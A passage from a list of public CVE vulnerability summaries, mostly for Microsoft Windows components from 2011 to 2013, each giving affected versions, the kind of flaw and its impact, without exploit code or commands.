SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in 